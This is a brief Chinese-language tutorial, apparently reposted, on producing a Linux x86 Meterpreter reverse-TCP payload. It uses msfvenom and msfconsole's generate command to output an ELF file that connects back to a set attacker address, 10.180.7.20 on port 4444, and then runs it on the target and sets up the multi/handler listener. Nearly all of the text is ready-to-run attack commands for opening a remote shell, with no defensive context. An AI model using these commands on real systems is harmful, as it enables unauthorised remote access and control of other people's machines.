Linux下反彈meterpreter及生成payload的兩種方式


1、CLI下生成payload

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elf

 

 

 

2、msfconsole下生成payload

use payload/linux/x86/meterpreter/reverse_tcp    並設置option

 

 

generate -h  有豐富的選項

 

 

generate -f elf -o /shell.elf   根據需要添加選項   -o輸出文件到指定目錄

 

 

 

3、在靶機上執行該文件,並在msf下監聽

在靶機上給文件賦值,並執行該文件

 

 

在msf監聽端口

msf  >  use exploit/multi/handler
msf  >  set payload linux/x86/meterpreter/reverse_tcp
msf  >  set LHOST 10.180.7.20
msf  >  run


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM